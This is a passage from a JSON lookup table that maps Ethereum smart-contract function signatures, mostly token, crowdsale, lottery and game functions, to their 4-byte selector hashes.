"0x15b7ab02", "AgriChainMasterContract()": "0x1a620a3e", "setChainType(string)": "0x0851d08c", "setChainRoot(address)": "0x17653b6e", "setChainPrev(address)": "0x385af1c3", "setChainNext(address)": "0xe4cfcbf7", "setChain(string,address,address,address)": "0xa5c02493", "AgriChainDataContract()": "0xe81766e8", "BaseAgriChainContract()": "0xa8b82c5b", "setReferralFee(uint8)": "0x594ffb4e", "setDividendFee(uint8)": "0x65cd048b", "allowApprovee(address,bool)": "0xaa879119", "Halo()": "0x0e7b592a", "SmartVows(string,address,address,string,address,address,string,string,string,string,string,bytes,bytes)": "0x845eaedb", "STBToken()": "0x3b6ed992", "PigChain()": "0x03d5aa0c", "MANHATTANPROXYRIVDR()": "0x03070ae7", "sendFunds(address)": "0xcfe52bdd", "myICO()": "0x0031a48e", "BadBitchCoin()": "0x64669d1b", "Token(address[],uint256[])": "0x6e6d9a6c", "requireOwnerUnlockedAmount(uint256)": "0xff22028b", "releaseLockedTokens(uint8)": "0x97672729", "addTokenLock(uint256,uint256)": "0x9d913c64", "enablePublicTransfers()": "0x5e43f719", "getCrowdsaleHardCap()": "0xe814018d", "crowdsaleSuccessful()": "0xd5ab7f30", "addressIsCrowdsale(address,address)": "0x6a6ba5d7", "crowdsaleSet()": "0x0bc7760c", "enter(bytes32,bytes8,uint16)": "0x79991997", "StrongKek()": "0xf3e238d2", "Arcturus()": "0x2aae7f26", "getNameOfAddress(address,address)": "0x487e1d1f", "CryptoPeopleName()": "0xe2aa2dcf", "Btcandres()": "0xa270907c", "REDGILL()": "0xc54117ac", "economyBoost(uint16,uint16)": "0xe9084739", "CityMayor()": "0x82b0444e", "EricToken(uint256,string,uint8,string)": "0x0d6d1e64", "messageSenderAddress()": "0x3dfa0384", "thisAddress()": "0xd4dca69b", "flags(address,address)": "0x3dda37dc", "setFlags(address,address,uint256)": "0xa58b7eed", "getFeeParameters()": "0x4722b4a5", "setFeeParameters(uint256,uint256,uint256,uint256)": "0xd5bf2dbe", "nonce(address)": "0x70ae92d2", "delegatedTransfer(address,uint256,uint256,uint256,uint8,bytes32,bytes32)": "0xc97e8480", "GHIToken(address)": "0x3c21f0a1", "AslanToken()": "0xa7677ee3", "EBANKTOKEN()": "0x9b58316a", "sqrtAsm(uint256)": "0x40d113da", "getTotalFor(uint256,uint256)": "0x4cc2c0fe", "closePoll(uint256)": "0x9534e637", "createPoll(address,bytes32,uint256)": "0xbf94de12", "Atlas()": "0xc1c02a46", "oraclize(bytes32,bytes,bytes,bytes,string,bytes,bytes,uint256,bytes)": "0x86127ecf", "getProof(string,string,string)": "0x6194416b", "upgradeComponent(uint256,address,address)": "0x32da3fe3", "_addWeiAmount(uint256)": "0x90c2365e", "redeemLottery(uint256)": "0xeac34569", "transferJackpot(address)": "0x3a067e64", "updateSpaceshipStatus()": "0x50a5ebd9", "startSpaceship()": "0xb139af17", "stopPortalGunAndRick()": "0xeaf4181a", "startPortalGun()": "0x05b542d9", "resetRick()": "0xc60f6462", "startRick()": "0x5c3a4c3d", "balanceOfFlurbo(address)": "0xb2389da8", "balanceOfRick(address)": "0xfefd41b9", "balanceOfMorty(address)": "0xebf95043", "citadelBuy(uint256,address)": "0xe4db915e", "getEvilMortyAddress()": "0x81ea6834", "setPercentWeiMC(uint256)": "0x301249eb", "setPercentWeiJackpot(uint256)": "0xe1da5637", "setPercentWeiDividend(uint256)": "0x9b8eb288", "setNextSeedHash(uint256)": "0x47d1045f", "transferOwnership(address,bool)": "0xb242e534", "setDataLink(uint256,string)": "0x145a0adc", "setRemark2(string)": "0x95949823", "setRemark1(string)": "0xea7a0142", "setTradeable(bool)": "0x7f002ffe", "getDataByIndex(uint256)": "0x321489d4", "initAsset(uint256,string,string,string)": "0xcf951c9f", "TaxicToken()": "0x80d7f7ac", "DMC()": "0x2e4d2a09", "ReassingTokens(uint256,uint256)": "0xba4442ab", "AddProject(uint256,address)": "0xf9991f33", "EnableMember(address)": "0x260abfa5", "AddTokensToMember(address,uint256)": "0x1a629b00", "AddMember(address,uint256)": "0x8c79ca5d", "Members_info(address)": "0xef80027e", "Member_AssingTokensToProject(uint256,uint256)": "0x5d47762d", "Project_Enable(uint256)": "0x516f6afd", "Project_ChangeOwner(uint256,address)": "0xf29143ad", "Project_Info(uint256)": "0xdb112977", "Project_RemoveToken(uint256,uint256)": "0x7423ab57", "CNotesICO()": "0x1fd97c12", "CNotes(string,string,uint8,uint256,uint256)": "0x837564dd", "BitHaus()": "0xfddc5545", "GMOON()": "0x18e4c3f3", "AcceptsGMOON(address)": "0x6d7ab187", "TaiCoin()": "0xa3429689", "PossContract()": "0xb686a635", "Dashidai()": "0x9e7010a8", "UNHCToken(uint256,string,string)": "0x2cd44064", "AIToken(uint256)": "0xcb28ba6a", "hasEnoughAllowance(address,address,uint256)": "0x0c89ef35", "approveTokenCollection(address,address,uint256)": "0x97ebe0d6", "ExShellStock()": "0x985d5702", "BBBToken(uint256,string,string)": "0x57135859", "ARMtest()": "0x2211218a", "ABCToken()": "0x4223ac0f", "Roto2coin()": "0xbdc31ce8", "getPlayerAwardByRndNo(uint256,address)": "0xd982466d", "buyKeyByAddr(address)": "0xc5960c29", "buyKeys(address)": "0x299e952f", "EVTCTLToken(address,uint256)": "0x2080d8dc", "OxShelterEye()": "0x965a324e", "updateAddresses(address)": "0xa643c1a0", "setEditedFalse(address)": "0x421aeba2", "setEditedTrue(address)": "0x062bbe59", "C2L()": "0xe8cf56a9", "NXX()": "0xe94c8dc0", "BetterBitcoin()": "0xe8d199ec", "processRebond(address,uint256)": "0x28efa3a6", "isValidUnbondingLock(address,uint256)": "0x0fd02fc1", "getDelegatorUnbondingLock(address,uint256)": "0x412f83b6", "rebondFromUnbonded(address,uint256)": "0x3a080e93", "rebond(uint256)": "0xeaffb3f9", "unbond(uint256)": "0x27de9e32", "changeAllowTransferWallet(address)": "0x0c620494", "setMinPersonalCap(uint256)": "0x7ca21b37", "setSpaceImpulse(address)": "0x524ee639", "BackdoorBurner(uint256,string,uint8,string)": "0xc84a6140", "increasePresaleEndTime(uint256)": "0x1f3ce938", "ZIMBOCOIN()": "0x74a205d9", "playerWithdraw(address)": "0x8325229a", "core(address,uint256,address)": "0x678377d2", "updateTeamV(address)": "0xb72a97e6", "RecyclerToken(uint256,string,string)": "0xbd815a10", "TokenOTBC(uint256,string,uint8,string)": "0xfdd42e29", "Bitnova()": "0x179194e1", "Freecoins24()": "0x8209b38a", "accrueBonusTokens(address,address,uint256)": "0x8b12befe", "accrueAdvisorsTokens(address,address,uint256)": "0x62a76ce1", "accrueInvestorsTokens(address,address,uint256)": "0xf12f5409", "accrueTeamTokens(address,address,uint256)": "0xfaf9f330", "CheersWangToken()": "0x9ef95545", "smxTeamAddress()": "0x253089b5", "MediatedTransaction_Protection_Seconds()": "0xd129ee38", "total_supply()": "0x3940e9ee", "CREATE_AMOUNT()": "0xf97944e0", "jackpotPercent()": "0xbf4637e5", "BirthFee()": "0xa7c5c2a2", "chfCentsPerToken()": "0xf2c340f2", "endTokensale()": "0x28e8bc61", "valueTotalSupply()": "0x735cfff2", "capDay2()": "0xfd8ac8d0", "Team_Wallet()": "0xeacc25e7", "votingActive()": "0x408e2727", "claimableToken()": "0xf6d6d5aa", "Bst()": "0x6e500306", "preAllocationsPending()": "0xe732a7e1", "p1_white_duration()": "0x7b38f391", "margin()": "0x8f76691a", "winnerIndex()": "0x8f00cbfa", "CodeEligible()": "0xc30bf4d8", "COMPLIANCE()": "0x72eab193", "profitsSent()": "0xec503611", "escrowWallet()": "0x92d3be79", "startSpreadingBlock()": "0x6d082bbb", "isLottoStarted()": "0xb968486e", "mayGenerateAddr()": "0xff0bfc91", "TOKEN_MIN()": "0xe74799b4", "bonusAmount()": "0xabadaf9a", "defcon()": "0x22d40b96", "maxAddresses()": "0x93e5365f", "getRightToken()": "0x5237d235", "MAX_ATHENIANS()": "0x0a790e19", "weiMinSale()": "0xf4f6d6fe", "maxWithdrawal()": "0x8c0ff5b7", "RESERVED_OTHERS_SIDE()": "0xdfa15b58", "totalSupplyMax()": "0xf50249fc", "hardCapLowUsd()": "0x6bd31a56", "chainLedger()": "0xf5727f5c", "WalletHolder()": "0x6b24d827", "phase1EndBlock()": "0x575d462a", "etherInUSD()": "0x2207a93a", "lastBlock_f18Hash_uint256()": "0x414ee145", "SoundcoinsAddress()": "0x131c4305", "gasForOraclize()": "0x7072a977", "maxCoinCap()": "0x908e2d2a", "icoEtherReceivedMainSale()": "0xb0228f8c", "developersWallet()": "0x38874945", "totalFeeCollected()": "0xb9b2b5cd", "residualAmountPromille()": "0x3057d5e0", "setBeneficiary()": "0x45239b90", "Alfacoin()": "0xea983f7f", "secondRoundICOStart()": "0x1e9a04a7", "expReward()": "0xf019c5da", "addressFundReserve()": "0x127f902f", "teamTwoDivsUnclaimed()": "0x92979037", "ninthTime()": "0x65bdadf6", "DICE_HIGHER()": "0x9bdce046", "Y2_lockedTokenAmount()": "0xfaede6a1", "lastBlockNumber()": "0x2552317c", "etherLeft()": "0x8838b68e", "withdrawABIHash()": "0xfe26f16f", "claimJ()": "0xd407d212", "durationVoting()": "0xa6c94d2e", "devCut()": "0x9c286837", "numIntervals()": "0xa31e88c2", "submitBlock()": "0x25ceb4b2", "zecId()": "0xdeb2432b", "roundFourBlock()": "0xe5a284f8", "initializeTime()": "0x5e4887bd", "SENDER_BALANCE()": "0x014345c8", "makerWithdrawEther()": "0x28155727", "avt()": "0x3b9aaae4", "IOUSupply()": "0xc0f70d5a", "minPurchase()": "0x33b5b62e", "turnon()": "0x084592cb", "airdropadd()": "0x15aec1fb", "reservedTokensAddress()": "0xd86eb3b7", "reserve1Address()": "0x63cb2afb", "getLastProfit()": "0xf560783d", "usedAPI()": "0xdb5f5d7c", "board()": "0x7cd3229a", "referralCount()": "0x89b52360", "confirmedAmount()": "0x85f07b64", "balance_in()": "0x148ab04e", "dashId()": "0x2911c9e7", "closingTimePeriodTwo()": "0xc909b929", "wallet_address()": "0xe776a5b5", "court()": "0x00971a30", "whitelisterAddress()": "0x3f7da39a", "Ownable1()": "0x344090f2", "PRESALE_PERCENTAGE_3()": "0x61ad487c", "drawFee()": "0xd75e30cf", "nextArenaTime()": "0xf8354a82", "purchaseFinished()": "0x90b9c31a", "exchangeRateMNY()": "0x8f608f4f", "getMarketOptions()": "0x43777117", "Votes()": "0xad5022a5", "RECEIVER()": "0xad7430cc", "mainMultisigEther()": "0x68f91814", "currentTokenOffered()": "0xd429bfae", "netAddress()": "0xe54a9646", "giveawayFee()": "0xf645496e", "WBE()": "0x22326584", "HEART(uint256,string,string)": "0x9ecf12cb", "RhinexFundCoin()": "0x5ec94770", "ScarcecoinStart()": "0x41ebe9c6", "setEtherCostOfEachToken(uint256)": "0x8a98deca", "NortontokenERC20(uint256,string,string)": "0x3ee71e85", "DiscoverCoin()": "0x242aeac1", "SLFYCoin()": "0x826db6c8", "isBasicAccount(address)": "0x4082defb", "setHalted(bool)": "0xdcc279c8", "flushEra()": "0xe24c36d0", "finalise(address)": "0x330c3fe5", "inject(address,uint128)": "0xbac6068c", "moveStartDate(uint256)": "0xcb86df95", "SecondPriceAuction(address,address,address,address,address,uint256,uint256)": "0x685e78fb", "_hasIcoContributorType(address)": "0x060a02b7", "_lookupOwnerIdentityCount(address)": "0x0fcbbc8e", "_preventedByNationalityBlacklist(address,uint256)": "0x9d144f8a", "isVerified(address,uint256)": "0x1a209776", "NotakeyVerifierForICOP(address,address)": "0x74dcfd37", "getSubjectCountByAddress(address)": "0x3f266242", "getSubjectClaimSetEntryAt(address,uint256,uint256,uint256)": "0x6ec7743d", "getSubjectClaimSetSize(address,uint256,uint256)": "0x1c8cba3b", "getSingleSubjectByAddress(address,uint256)": "0xad6eba9f", "isPrivilegeAddress(address)": "0x173ea341", "removePrivilegeAddress(address)": "0xd661952a", "addPrivilegeAddress(address)": "0x2c16c6ca", "isPresaleHolder(address)": "0xbff65668", "removePresaleHolder(address)": "0x2fcaa8fa", "addPresaleHolder(address)": "0x67ed583f", "isUtilityHolder(address)": "0x5b8ad515", "removeUtilityHolder(address)": "0xe0bfa1f7", "addUtilityHolder(address)": "0xcb2c8723", "isAllowedHICAddress(address)": "0x1c3f7637", "removeAllowedHICAddress(address)": "0x8ca5d525", "addAllowedHICAddress(address)": "0x2d103ed4", "cancelApprove(bytes32)": "0x11dd39b4", "releaseApprove(bytes32,uint8,bytes32,bytes32)": "0xf7bc2003", "releaseTransfer(bytes32,uint8,bytes32,bytes32)": "0xc59d55ad", "isBiometricCompleted(bytes32)": "0xedf6fb4b", "setBOPSAddress(address)": "0x37d2d350", "isBiometricLockedOnlyOwner(address)": "0x1ba88666", "isBiometricLocked(address)": "0x79501a83", "isSenderBiometricLocked()": "0xcfba24ac", "bioUnlock(bytes32,uint8,bytes32,bytes32)": "0xf9f94bc6", "bioLock()": "0x68ebd450", "sendETHToContributionWallet(uint256)": "0x96da1fba", "whiteListAddress(address,bool)": "0x9dd21928", "resumeIEO()": "0xaea57be4", "haltIEO()": "0x3e99633f", "contribute(address,uint256,uint8,bytes32,bytes32)": "0x0c2c5add", "eligibleCheckAndIncrement(uint256,uint256)": "0x9342160b", "getIEOId()": "0x779ad324", "validateContributor(address,uint256,uint8,bytes32,bytes32)": "0xbf6a10d7", "IEOEnded()": "0x0a0513da", "openIEOStarted()": "0x76c44a80", "IEOStarted()": "0x60887081", "setContributorCap(uint256)": "0x86d3a2b8", "eligible(uint256,uint256)": "0x81d961e4", "getContributorRemainingCap(uint256)": "0xd32e245b", "setRateEthToToken(uint256,uint256)": "0x0707a106", "CroatiavsDenmark()": "0xc0edec55", "ZTF()": "0x014e6996", "AibitbankToken()": "0xccff361f", "BGFTToken(uint256,string,string)": "0xd74a960e", "destroyRemainingTokens()": "0xe2069734", "MYToken(uint256,string,uint8,string)": "0xe62580cb", "calcRandomNumber()": "0x3b3d9485", "calcExchangeRate()": "0xdb5f2f31", "userPlay()": "0xc8e0f101", "publicGetUserHistory(address,uint256)": "0xabc6affb", "publicGetUserInfo(address)": "0xefd6479a", "publicGetExchangeRate()": "0x450cabcb", "Mintloot()": "0xb501df23", "catchStarters()": "0xc4236cdc", "setCastle(uint64,uint64,uint64,uint64,uint64,uint64)": "0x4a826823", "hasValidParam(address,uint64,uint64,uint64,uint64,uint64,uint64)": "0x1bab0908", "getValidClassId(uint64,address)": "0xe7bb22cd", "setMaxDexSize(uint256)": "0x08c977e7", "quickSetStarterClasses()": "0xca85dbfc", "setStarterClass(uint256,uint32)": "0x6bd4dfce", "EtheremonRankBattle(address,address,address)": "0xdca80bc6", "RL(uint256,string,string,bool)": "0x21895086", "buyByTomo(address,uint256)": "0x286294b3", "buyByEth(address,uint256)": "0x31277306", "godMode(address,address,uint256)": "0x07f3f764", "payWithMerculet(uint256)": "0xaed5c011", "CryptoSagaCardSwapMerculet(address,address,address,address)": "0xabd6b000", "setMerculetPrice(uint256)": "0x158163c8", "CloseDiv()": "0x2d3727bf", "GetDiv()": "0x45e479f6", "SetDivTime(uint256)": "0xffe8ee35", "PutDiv(address)": "0x0f776fb2", "Weekycoin()": "0x631a925c", "CGCGToken()": "0x1fe3aec7", "depositTokensForAccount(address,address,address,uint256)": "0xfbf2dd6a", "LavaDeposit(address)": "0x5d34b70c", "RLCOIN(uint256,string,string,bool)": "0x7babf021", "ERC20Template(string,string,uint8,uint256,address)": "0x6f4f2ec3", "farmItems(address[],uint256[])": "0x6846187f", "initialBuy(address[])": "0x369b1ce5", "set_Shops(address[],address[])": "0x359ae0f3", "set_Total(uint256)": "0x72112ebc", "set_Gas(uint256)": "0xbf254915", "claimRewards(uint16[],address)": "0xb7ef5fed", "claimCancelled(uint16,address)": "0xc54b25b0", "claimRoundReward(uint16,address)": "0x542ccddb", "bet(uint16,bytes32)": "0xa684ff03", "setRoundFinalScore(uint16,bytes32)": "0xc2f4976f", "getRoundBets(uint16)": "0x55642be7", "extendRound(uint16,uint256)": "0x0678c282", "getRoundStatuses(uint16)": "0x4fb46d5c", "createRound(string,bytes32[],uint256)": "0x22556bd7", "setCOOAddress(address,address)": "0x55616107", "setCEOAddress(address,address)": "0xb4873ac7", "setMinimumBetValue(uint256)": "0x120bd8f5", "GoodTo(uint256,string,string)": "0x4c1334a8", "bet1000_01eth()": "0x40bcff15", "MKToken()": "0xe755e077", "getUidLastUpdate(string)": "0x502fe251", "getUidAsInteger(address,address)": "0x5e5de297", "getUid(address,address)": "0xee92fda1", "setApp(string,uint256)": "0x194c78d0", "switchManagerAndRemoveOldOne()": "0x4ef8086a", "setNewManager(address,address)": "0xab5e5158", "BFYToken()": "0x320878d5", "tokenWithdraw()": "0x30c74e04", "XRRsale()": "0xb3a7cbf6", "TransferMinersReward()": "0xc2cca62c", "DebitCoinToken(string,string,uint8)": "0xdce6417d", "passedKYC(address)": "0xccd9aa68", "setPicopsCertifier(address)": "0xf581f1ef", "GRAMATON()": "0xc2aeb355", "setTokenAddr(address)": "0x2ebd1e28", "setTotalToken(uint256)": "0x79e1250d", "collectEth()": "0xfada5da1", "allowClaim(address)": "0x24a69051", "endContrib()": "0xb7b3ea98", "beginContrib()": "0x3ac8ca63", "GroupBuy()": "0xaeedc9e9", "changeTeamWallet(address)": "0xb06e1e02", "MyToken(string,string,uint8,uint256)": "0xde9a1bdb", "stopTakeToken()": "0xce3cef0d", "startTakeToken()": "0x62ee7b03", "isFriend(address)": "0x68125a1b", "setFriend(address)": "0x089c9964", "SUCToken(address)": "0xa568907a", "VirginToken()": "0x3cfd1f80", "Bolton()": "0xf6b781a1", "BDayToken()": "0x83df762f", "ATLToken()": "0x3e6784b8", "isTransferable(address,address,uint256)": "0x2f318039", "transferCommissionReceiver(address)": "0xf1dd08b4", "_finalRoundLosersFight()": "0x0bd61e79", "_finalRoundWinnersFight()": "0x50710ef5", "_secondRoundLosersFight()": "0x6aa179d9", "_secondRoundWinnersFight()": "0x93fc5ebb", "_firstRoundFight()": "0xf77c4ff9", "setParticipationFee(uint256)": "0xc88098f2", "setDungeonDifficulty(uint256)": "0x8809716c", "setLosePercent(uint256)": "0xb7f1489e", "setWinPercent(uint256)": "0x01f865c3", "setJackpotWinPercent(uint256)": "0x8fd237e1", "setJackpotWinCount(uint256)": "0xe866d302", "cancelTournament()": "0x646156aa", "startTournament()": "0xbf559d11", "joinTournament(uint256)": "0xd115cac6", "getNextTournamentData()": "0x985c7564", "EDColiseum()": "0x7dbecc54", "Coincirculationchain()": "0xba02e9f2", "JTC(uint256,string,string)": "0x04578f90", "maybeUpdate()": "0x2f674ab9", "DividendManager(address)": "0xa6e4002e", "releaseForTransfer()": "0x1139a355", "transferFromByCrowdsale(address,address,uint256)": "0x54517ddf", "transferByCrowdsale(address,uint256)": "0xdbbbe8df", "transferByOwner(address,address,uint256)": "0x5a15c373", "LetItPlayToken(address,address,address,address,address,address,address,address)": "0x7de6c905", "doTeamMinting()": "0x8508a693", "finishCrowdsaleMinting()": "0x32dea130", "doCrowdsaleMinting(address,uint256,int256)": "0xffacf300", "DATING()": "0x668c8573", "TimetechToken()": "0x7050a1ea", "JustTheTipCrowdsale(uint256,uint256,uint256,address)": "0x7e55a212", "WhosItGonnaBe()": "0x12abbaaf", "WaltixToken()": "0x6adc674e", "MELON()": "0xf43e3918", "MANHATTANPROXY1STAVE()": "0x0b393a9d", "Vetricoin()": "0x19608123", "COREXCoin()": "0xdc1b93cb", "updatePackage(uint256,string,address)": "0x3592dfea", "addPackage(string,address)": "0x226bf449", "OrpheusRoyalSiamRailways()": "0xc31a0972", "MMCoin(uint256,string,string)": "0x8c94db38", "FixedSupplyCrowdsale(uint256,address,address,uint256)": "0x7f7575c9", "GOTGCOIN()": "0x2d4c4aea", "DACContract()": "0xb7a1affa", "IndiaStocksCoin()": "0x7c996d9e", "ATTToken()": "0x29189c9e", "myProfitsReceived()": "0xfb3bc400", "setTokenController(address)": "0xe102baab", "CryptoTorchToken()": "0xe47f18d0", "Travelerscash()": "0x2cbe679b", "setVnt(address)": "0x9e86d7a8", "VentanaToken()": "0xd80326a9", "changeVeredictum(address)": "0x636544be", "CPCToken()": "0x98a87f7d", "GCOXACMToken(string,string,uint8,uint256)": "0xd1e34733", "HOU(uint256,string,uint8,string)": "0x9788a8e7", "BRC()": "0x2ddc36ba", "buySpecialBuilding(uint256,uint256,uint256)": "0x8878d726", "buyItem(address,uint256)": "0x9f37092a", "sellItem(uint256,uint256)": "0x2d923561", "claimSpecialResource(uint256)": "0xe944a6d7", "claimBasicResources()": "0x4d14c57e", "expandY()": "0x656b275c", "expandX()": "0x23a52674", "buildAt(uint256,uint256,uint256)": "0x34085549", "initiateUser()": "0xa8f5bbd9", "newLeader()": "0xa24ed8aa", "logResources()": "0x76266ce9", "initBuilding(uint256,uint256,uint256,uint256,uint256,uint256)": "0x1635e13c", "Kingdom()": "0x2fffaa00", "MWAV()": "0x1bb02ffb", "Strings(string,string,uint8,uint256)": "0x15e04206", "refundToWallet(address)": "0x924b39ae", "instruct_5()": "0x41c1f60e", "instruct_4()": "0x2a24b8e1", "instruct_3()": "0x08ab4097", "instruct_2()": "0x5ee10f3b", "instruct_1()": "0xd865a374", "getarg_3_input()": "0x535999aa", "setarg_3_input(uint256)": "0x865232fb", "getarg_3()": "0xa3b65d29", "setarg_3(uint256)": "0xd7020b0c", "getarg_2_input()": "0xde1c237f", "setarg_2_input(uint256)": "0xa02745af", "getarg_2()": "0xacd19170", "setarg_2(uint256)": "0x384e04c9", "getarg_1_input()": "0x34a8eb53", "setarg_1_input(uint256)": "0x03872547", "getarg_1()": "0x3a338256", "setarg_1(uint256)": "0x16afe218", "BOT_ELEMENT_1()": "0xde934d86", "NKN()": "0x8054b2f2", "bulkMint(uint32[],address[],uint256[])": "0x9c147688", "NUTScoin()": "0x9f242bf5", "LANA()": "0x7fdc5bd6", "FACHAINStandardToken(uint256,string,uint8,string)": "0xac9f9d12", "DADXChainERC20()": "0x0ef72880", "EFAFCOIN()": "0x0fbed9fe", "CVToken()": "0x0bf34d54", "releaseAdvisorsTokensForPercentage(uint256)": "0x0feca6d5", "releaseAdvisorsTokens()": "0x2e5a6f17", "airDropTokens()": "0xf5f06acc", "HotPotToken()": "0xefca0214", "setSettings(uint256,uint256)": "0x37a28979", "outcomeState(address,uint256,uint256)": "0x7d6b4278", "marketState(address,uint256)": "0x2f5ebbaa", "resolve(uint256,uint256,bool)": "0x22be9342", "bet(address,uint256,uint256,uint256)": "0x50010427", "Totalizeum()": "0xd1f61c44", "SmileToken()": "0x938d0444", "RepoToken()": "0x360035c6", "create(address,uint256,uint256,uint256)": "0x8c71ec16", "fundOrderInternal(address,uint256)": "0xf6660246", "refundInternal(bytes32,address,uint256)": "0x07dc6f12", "paymentInternal(bytes32,uint256[],uint256)": "0xda7360df", "additionalInternal(bytes32,uint256[])": "0x01612def", "refundAction(bytes32)": "0xb9103e1f", "acceptAndPay(bytes32,uint256[],uint256[],uint256)": "0x3091bc8b", "createRequest(address,address[],address[],int256[],address,string)": "0xb81bb854", "createRequestAsPayer(address[],int256[],address,uint256[],uint256[],string)": "0x1e24e029", "createRequestAsPayee(address[],address[],int256[],address,address,string)": "0xafd6b607", "RequestEthereum(address,address)": "0xf9a0fcc7", "setFeesPerTenThousand(uint256)": "0x38bf77c3", "RequestEthereumCollect(address)": "0xe35060d9", "Tracto()": "0x6f4ca36e", "setTokenMinter(address)": "0x78533e90", "DiceGameCrowdsale(address)": "0x8cc2f547", "EscrowVault(address,address)": "0x28baf31d", "internalBuyTokens(address,address,uint256)": "0xc24504b7", "setTokenDeskProxy(address)": "0x590daaec", "withdrawAbleEther()": "0xb7a2d99d", "withdrawContractEther(uint256)": "0x1e73b362", "getCarveUpTokens()": "0x9eaf17a1", "getTokenById(uint256)": "0x7bdc60d9", "__createNewToken(address,string,uint256,uint256,uint256,uint256)": "0xfc324642", "updateUnsold(string,uint256,uint256)": "0x15303771", "createByCOO(string,uint256,uint256)": "0x21f118a6", "joinCarveUpTen(uint256)": "0xb8cd4a8e", "NFToken()": "0xb6cb5d72", "getMangers()": "0xa924d3ca", "startLive()": "0x83617782", "stopLive()": "0xf2ffb4fc", "staffInfo()": "0x62cee7ad", "CommonEth()": "0x0254aa41", "CTHToken()": "0x65df517e", "TRONClassic(uint256,string,string)": "0x8cd0fc3d", "tTokens()": "0x33f37304", "TradeAdsCoin()": "0xec7bbcd2", "transferInGame(address,address,uint256)": "0x459a6589", "changeGame(address,uint256)": "0x4932ce32", "addGame(address)": "0xd72d04db", "GetSellPrice()": "0x871da475", "GetBuyPrice()": "0xbbb73e3e", "Coinvilla()": "0x1caf1752", "migrationSetPlayer(bytes32,uint256,bytes32,address,uint256,uint256,uint256)": "0xe07a2671", "migrationGetPlayer(bytes32,uint8)": "0x07501073", "migrationSetBoard(bytes32,bytes32,string,uint8,address)": "0xc6393e62", "migrationGetBoard(bytes32)": "0x897d55cd", "confirmBoardScore(bytes32,bytes32)": "0x9c8bb5d0", "addBoardScore(bytes32,bytes32,uint256)": "0x571ec8d9", "getPlayerId(bytes32,bytes32,address)": "0x26cee3a7", "removePlayerFromBoard(bytes32,bytes32)": "0x32644829", "getPlayerByBoard(bytes32,uint8)": "0x6a914911", "addPlayerToBoard(bytes32,bytes32)": "0xe349c313", "changeBoardMetadata(bytes32,bytes32,string)": "0x31978b99", "getBoardByHash(bytes32)": "0x79e12f7e", "createBoardHash(bytes32,address)": "0xa15bb363", "addNewBoard(bytes32,string)": "0x51d24a33", "split(address,uint256)": "0x5d1e2d1b", "setCosts(uint256,uint256)": "0xdb589907", "DYITToken(uint256,string,string,uint8)": "0x86068367", "ChuCunLingAIGO(uint256,string,uint8,string)": "0x054d2a7e", "dtTestCitySnapshot(address,uint256)": "0xf76692a6", "dtValidateCitySnapshot(address,uint256)": "0xe08761f5", "dtTestWorldSnapshot(uint256)": "0x5386b7ad", "dtValidateWorldSnapshot(uint256)": "0x8118e0ae", "dtAddEthBalance(address,uint256)": "0xd960924d", "dtSetEthBalance(address,uint256)": "0xb8857936", "dtGetEthBalance(address)": "0x400d1f45", "dtGetBuildingData(address,uint256)": "0x5bb5bb86", "dtGetCityData(address)": "0xebb0e631", "dtCreateCityData(address,uint256,uint256)": "0x3c3be494", "dtGetWorldData()": "0x1963df66", "UpdateEthBalance(uint256,uint256)": "0x55fbc8c2", "daytime(uint256)": "0xfb92507d", "adminGetBalance()": "0xd1613731", "adminAddWorldBalance()": "0xd489a018", "adminSetConfig(address,address,address)": "0xc98fc4d9", "adminIsAdmin()": "0x86f6e410", "TradeEthShop(uint256)": "0x63c65056", "GetEthShop()": "0xc8fd39f7", "WithdrawEther()": "0x18ee1b9f", "GetEthBalance()": "0x505903ba", "DemolishByCredits(uint256,uint256)": "0xfb17905f", "UpgradeByCredits(uint256,uint256)": "0x1fe2c933", "BuyCreditsByEth(uint256)": "0x7ea30d5d", "BuyLandsByEth(uint256)": "0x931e44e2", "ConstructByEth(uint256,uint256)": "0x817eca0c", "ConstructByCredits(uint256,uint256)": "0x07a3082d", "GetCitySnapshot()": "0x97788180", "GetCityData()": "0x89b337a7", "GetWorldSnapshot()": "0xb4d07c7d", "SetCityName(bytes32)": "0x7a5f715c", "StartCity()": "0xc975653d", "IsPlayer()": "0x0b4da628", "TestCitySnapshotInternal(address,uint256)": "0xa73467bd", "ValidateCitySnapshotInternal(address,uint256)": "0xd7dd2ae3", "TestWorldSnapshotInternal(uint256)": "0xd98a977d", "ValidateWorldSnapshotInternal(uint256)": "0xcf3e52b8", "adminGetPlayer(uint256)": "0xf13707b3", "adminGetPlayerCount()": "0xec0373c6", "adminTransferContractBalance(uint256)": "0x4e53b564", "adminGetContractBalance()": "0x58f3da21", "adminTransferWorldBalance(uint256)": "0xfe553250", "adminSendWorldBalance()": "0x9a7db5d9", "adminCollectPastShopFund()": "0xc1e1b327", "adminGetPastShopFund()": "0x0920829b", "adminUpdateWorldSnapshot()": "0xbc7b801e", "adminSetCityData(address,bytes32,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x18cf85d1", "adminGetCityData(address)": "0x2bb768f0", "adminSetWorldSnapshot(uint256,bool,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x361698ff", "adminGetWorldSnapshot(uint256)": "0x5f92dee8", "adminGetWorldData()": "0x6f66d23b", "adminSetEnabled(bool)": "0xb4375dc9", "adminGetEnabled()": "0x58df8ed8", "nowday()": "0xc8c365fc", "TestCitySnapshot(address,uint256)": "0x2f0c9387", "ValidateCitySnapshot(address,uint256)": "0x2bb03f6d", "TestWorldSnapshot(uint256)": "0x7ccec110", "ValidateWorldSnapshot(uint256)": "0x524aa413", "UpdateEthBalance(uint256,uint256,uint256,uint256)": "0x5ff149ba", "TradeEthShop(address,uint256)": "0x5110d31c", "GetEthShop(address)": "0x51259770", "WithdrawEther(address)": "0xb744d2e6", "GetWithdrawBalance(address)": "0xdba4c85c", "AddEthBalance(address,uint256)": "0x35ae20bb", "SetEthBalance(address,uint256)": "0x7ecdb299", "GetEthBalance(address)": "0xf6f3144d", "SetBuildingData(address,uint256,uint256,uint256,uint256,uint256)": "0x0c85b18c", "GetBuildingData(address,uint256)": "0xc128c9e7", "SetCitySnapshot(address,uint256,bool,uint256,uint256,uint256,uint256)": "0x54f51d32", "GetCitySnapshot(address,uint256)": "0xbce9ccb9", "SetCityName(address,bytes32)": "0xc578f2c8", "GetCityName(address)": "0xfaa06c06", "SetCityData(address,uint256,uint256,uint256,uint256,uint256,uint256)": "0x71bdbc9a", "GetCityData(address)": "0xe47c0c20", "impl_forging(address,uint256,uint256)": "0xc6357b54", "dequeueDouble()": "0xa84b9de0", "dequeueAlternately()": "0xde850c71", 